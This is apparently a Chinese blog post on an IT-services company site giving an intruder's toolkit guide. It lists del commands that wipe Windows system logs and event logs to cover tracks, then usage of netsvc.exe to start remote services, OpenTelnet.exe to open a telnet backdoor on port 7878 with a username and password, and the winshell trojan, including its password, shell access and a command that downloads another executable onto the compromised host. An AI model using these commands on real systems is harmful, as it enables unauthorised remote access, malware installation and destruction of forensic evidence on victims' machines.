网际网

公司愿景:为企业办公运维解决方案服务
弱电工程:网络布线;监控安装;智能系统
设备租赁:租打印机;租复印机;出租电脑
联系电话13713730648;0755-33942288
公司地址:深圳龙华民治樟坑1区109栋1楼
弱电工程公司

扫尾netsvc.exe,OpenTelnet.exe,winshell.exe

服务外包公司    运维服务    2012-12-29    9755    0评论

扫尾:

del C:/winnt/system32/logfiles/*.*

del C:/winnt/ssytem32/config/*.evt

del C:/winnt/system32/dtclog/*.*

del C:/winnt/system32/*.log

del C:/winnt/system32/*.txt

del C:/winnt/*.txt

del C:/winnt/*.log

一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list //IP地址

netsvc schedule //IP地址 /query

netsvc //IP地址 schedule /start

二、OpenTelnet.exe

远程启动主机的Telnet服务,并绑定端口到7878,例如:

OpenTelnet //IP地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入DOS方式下:

telnet IP地址 7878

三、winshell.exe

一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:

p Path (查看winshell主程序的路径信息

b reBoot (重新启动机器)

d shutDown (关闭机器)

s Shell (执行后你就会看到可爱的“C:/”)

x eXit (退出本次登录会话,此命令并不终止winshell的运行)

CMD http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

  • 扫码关注
    评论一下 分享本文 联系我们 扫码支付

    扫码支付X

    扫码付款
    网际网
    挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
    提交评论

    清空信息
    关闭评论
    弱电工程公司
    快捷导航
    技术扣扣
    付款方式
    邮件订阅
    联系我们
    加扣扣群
    返回顶部